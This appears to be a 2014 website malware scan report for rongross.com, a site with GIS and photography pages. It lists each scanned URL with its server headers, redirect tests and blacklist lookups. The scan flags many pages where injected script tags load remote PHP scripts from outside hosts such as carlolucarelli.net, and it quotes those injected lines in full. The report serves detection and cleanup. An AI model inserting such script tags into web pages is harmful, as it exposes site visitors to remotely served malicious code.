Scanned pages/files
Request | Server response | Status |
http://rongross.com/ | 200 OK Content-Length: 2081 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9219802"></script> | ||
http://rongross.com/gallery.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 10 Oct 2014 13:42:00 GMT Accept-Ranges: bytes Age: 0 Server: Apache/2 Content-Length: 693 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.rongross.com/gallery1.htm | 200 OK Content-Length: 5540 Content-Type: text/html | clean |
http://www.rongross.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:01 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.rongross.com/404.shtml | 200 OK Content-Length: 555 Content-Type: text/html | clean |
http://www.rongross.com/(none) | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:02 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/photos/panoramio.htm | 200 OK Content-Length: 972 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://thediabetesblueprint.com/program/7rvzcwc9.php?id=9221497"></script> | ||
http://rongross.com/gis | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:42:03 GMT Accept-Ranges: bytes Age: 0 Location: http://rongross.com/gis/ Server: Apache/2 Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/gis/ | 200 OK Content-Length: 2527 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220653"></script> | ||
http://rongross.com/gis/geocoding.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 10 Oct 2014 13:42:05 GMT Accept-Ranges: bytes Age: 0 Server: Apache/2 Content-Length: 664 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://www.rongross.com/gis | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:42:05 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/gis/ Server: Apache/2 Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.rongross.com/gis/ | 200 OK Content-Length: 2527 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220653"></script> | ||
http://www.rongross.com/feedback | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:42:07 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/feedback/ Server: Apache/2 Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.rongross.com/feedback/ | 200 OK Content-Length: 1204 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220621"></script> | ||
http://rongross.com/gis/gdi.htm | HTTP/1.1 200 OK Connection: close Date: Fri, 10 Oct 2014 13:42:08 GMT Accept-Ranges: bytes Age: 0 Server: Apache/2 Content-Length: 723 Content-Type: text/html X-Powered-By: PHP/5.2.17 | clean |
http://rongross.com/gis/tiger.htm | 200 OK Content-Length: 1467 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220656"></script> | ||
http://rongross.com/gis/usaprojections.htm | 200 OK Content-Length: 757 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220657"></script> | ||
http://rongross.com/gis/projections.htm | 200 OK Content-Length: 757 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220655"></script> | ||
http://rongross.com/gis/northpole.gif | 200 OK Content-Length: 46178 Content-Type: image/gif | clean |
http://rongross.com/gis/usnoca.htm | 200 OK Content-Length: 781 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220658"></script> | ||
http://rongross.com/gis/utm_us50.htm | 200 OK Content-Length: 252 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9220659"></script> | ||
http://rongross.com/gdi.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:13 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/tiger.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:13 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/usaprojections.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:14 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/projections.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:14 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/northpole.gif | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:14 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/usnoca.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:15 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/utm_us50.htm | HTTP/1.1 302 Found Connection: close Date: Fri, 10 Oct 2014 13:42:15 GMT Accept-Ranges: bytes Age: 0 Location: http://www.rongross.com/404.shtml Server: Apache/2 Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/photography.htm | 200 OK Content-Length: 1408 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://carlolucarelli.net/zqlfy4w2.php?id=9219817"></script> | ||
http://rongross.com/lfp | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 10 Oct 2014 13:42:16 GMT Accept-Ranges: bytes Age: 0 Location: http://rongross.com/lfp/ Server: Apache/2 Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://rongross.com/lfp/ | 200 OK Content-Length: 1068 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://thediabetesblueprint.com/program/7rvzcwc9.php?id=9221022"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rongross.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 13:41:59 GMT
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 2081
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...2081 bytes of data.
GET / HTTP/1.1
Host: rongross.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 10 Oct 2014 13:41:59 GMT
Accept-Ranges: bytes
Age: 0
Server: Apache/2
Content-Length: 2081
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...2081 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: rongross.com
Referer: http://www.google.com/search?q=rongross.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rongross.com
Referer: http://www.google.com/search?q=rongross.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rongross.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rongross.com/
Result: rongross.com is not infected or malware details are not published yet.
Result: rongross.com is not infected or malware details are not published yet.